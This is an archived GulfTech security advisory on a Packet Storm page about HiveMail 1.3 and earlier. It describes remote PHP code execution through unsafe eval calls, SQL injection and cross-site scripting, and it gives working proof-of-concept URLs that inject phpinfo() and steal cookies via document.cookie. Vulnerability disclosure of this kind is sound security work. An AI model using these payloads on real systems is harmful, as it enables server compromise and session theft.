exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HiveMail-1.3.txt

HiveMail-1.3.txt
Posted Feb 13, 2006
Authored by James Bercegay | Site gulftech.org

HiveMail versions less than or equal to 1.3 suffer from multiple vulnerabilities including SQL injection and remote code execution.

tags | exploit, remote, vulnerability, code execution, sql injection
SHA-256 | 0a7e4de0420d17d893ee2673c8b0d607b707cdbda3b947eeb1fa245008dbb70d

HiveMail-1.3.txt

Change Mirror Download
##########################################################
# GulfTech Security Research February 10, 2006
##########################################################
# Vendor : HiveMail
# URL : http://www.hivemail.com/
# Version : HiveMail <= 1.3
# Risk : Multiple Vulnerabilities
##########################################################


Description:
HiveMail is a powerful web-based email program that allows
you to offer personal email accounts to your visitors. This
makes HiveMail a popular choice for business and individuals
alike. Unfortunately there are a number of remote code
execution vulnerabilities in HiveMail due to unsafe eval
calls that may allow an attacker to compromise the underlying
web server. In addition there are also vulnerabilities that
allow an attacker to perform SQL Injection and Cross Site
Scripting attacks.



Remote Code Execution:
There are a substantial number of Remote Code Execution issues
in HiveMail that allow for an attacker to easily execute php
code on the target server. Lets have a look at the file named
addressbook.update.php @ lines 273-300

if ($_POST['cmd'] == 'remove') {
if ($contactgroupid == 0) {
eval(makeerror('error_addbookcannotremove'));
}
if (!is_array($contactcheck)) {
invalid('contacts');
}
$groupcontents = $DB_site->query_first("
SELECT contacts
FROM hive_contactgroup
WHERE contactgroupid = $contactgroupid
AND userid = $hiveuser[userid]
");
$groupcontent = explode(',', $groupcontents['contacts']);
foreach ($contactcheck as $bookid => $doit) {
if ($doit == 'yes') {
$key = array_search($bookid, $groupcontent);
array_splice($groupcontent, $key, 1);
}
}
$DB_site->query("
UPDATE hive_contactgroup
SET contacts = '".addslashes(implode(',', $groupcontent))."'
WHERE contactgroupid = $contactgroupid
AND userid = $hiveuser[userid]
");
eval(makeredirect("redirect_addbook_removeentries",
"addressbook.view.php?contactgroupid=$contactgroupid"));
}

In the above code the variable $contactgroupid is taken from
user supplied data. There are a few obstacles to bypass in
order for there to be Code Execution, but it is nothing too
complicated.

http:///hivemail/addressbook.update.phpcmd=remove&contactgroupid
=1%20--%20");phpinfo();@ob_start("&submit=1&contactcheck[]=1&con
tactcheck[]=2

The above command would successfully set $contactgroupid to
a value grater than zero, not cause an SQL Error, and eventually
get executed @ line 299. It should be noted though that even if
code execution isn't possible then SQL Injection within the same
variable $contactgroupid is. This same type of issues takes place
in a number of locations within HiveMail.

http://hivemail/addressbook.add.php?cmd=quick&messageid=1");phpin
fo();@ob_start("&popid=1&msgid=1

http://hivemail/folders.update.php?cmd=mark&folderid=0%20--%20%22)
;phpinfo();@ob_start(%22

The files calendar.event.php, index.php, pop.download.php,
read.bounce.php, rules.block.php, language.php and possibly
others contain vulnerable code very similar to that which
I pointed out earlier.



Cross Site Scripting & SQL Injection:
Hivemail is vulnerable to cross site scripting because it
makes use of unsanitized $_SERVER['PHP_SELF'] references.

http://hivemail/index.php/%22%3E%3Cscript%3Ealert(document.cookie)
;%3C/script%3E

Once logged in a malicious attacker could replace the code
above with the variable folderid containing a malicious SQL
statement and have it executed.



Solution:
The vendor was unresponsive to my contact attempts, and according
to some of the people on the HiveMail forums the project has been
fairly dormant as of late.

http://forum.hivemail.com/showthread.php?p=26745

Until an updated version of HiveMail is released users are very
strongly advised to not use this vulnerable application.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00098-02102006
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close